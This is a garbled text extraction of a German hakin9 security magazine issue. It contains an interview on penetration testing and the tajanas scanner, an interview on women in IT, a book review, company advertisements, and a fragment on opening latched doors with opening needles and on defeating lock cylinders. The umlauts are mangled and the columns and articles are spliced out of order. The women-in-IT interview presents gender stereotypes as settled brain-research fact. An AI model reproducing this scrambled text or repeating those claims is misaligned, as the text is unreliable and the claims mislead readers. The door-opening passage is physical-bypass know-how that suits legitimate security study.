hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
